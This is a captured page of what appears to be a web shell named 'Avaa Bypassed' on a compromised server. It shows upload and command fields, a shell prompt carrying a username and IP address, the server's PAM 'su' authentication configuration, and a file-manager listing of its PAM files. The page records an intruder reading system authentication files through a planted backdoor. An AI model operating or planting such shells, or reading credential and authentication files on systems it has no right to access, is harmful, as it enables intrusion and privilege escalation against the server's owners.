[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.135.220.239: ~ $
#%PAM-1.0
auth		sufficient	pam_rootok.so
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth		sufficient	pam_wheel.so trust use_uid
# Uncomment the following line to require a user to be in the "wheel" group.
#auth		required	pam_wheel.so use_uid
auth		substack	system-auth
auth		include		postlogin
account		sufficient	pam_succeed_if.so uid = 0 use_uid quiet
account		include		system-auth
password	include		system-auth
session		include		system-auth
session		include		postlogin
session		optional	pam_xauth.so

Filemanager

Name Type Size Permission Actions
atd File 272 B 0644
chfn File 342 B 0644
chsh File 342 B 0644
config-util File 232 B 0644
crond File 287 B 0644
dovecot File 157 B 0644
exim File 116 B 0644
fingerprint-auth File 702 B 0644
fingerprint-auth-ac File 702 B 0644
login File 796 B 0644
other File 154 B 0644
passwd File 188 B 0644
password-auth File 1000 B 0644
password-auth-ac File 1000 B 0644
polkit-1 File 155 B 0644
postgresql_cpses File 70 B 0644
postlogin File 330 B 0644
postlogin-ac File 330 B 0644
ppp File 144 B 0644
pure-ftpd File 466 B 0644
qemu-ga File 46 B 0644
remote File 681 B 0644
runuser File 143 B 0644
runuser-l File 138 B 0644
screen File 36 B 0644
smartcard-auth File 752 B 0644
smartcard-auth-ac File 752 B 0644
sshd File 943 B 0644
su File 540 B 0644
su-l File 137 B 0644
sudo File 200 B 0644
sudo-i File 178 B 0644
system-auth File 1000 B 0644
system-auth-ac File 1000 B 0644
systemd-user File 129 B 0644
vlock File 84 B 0644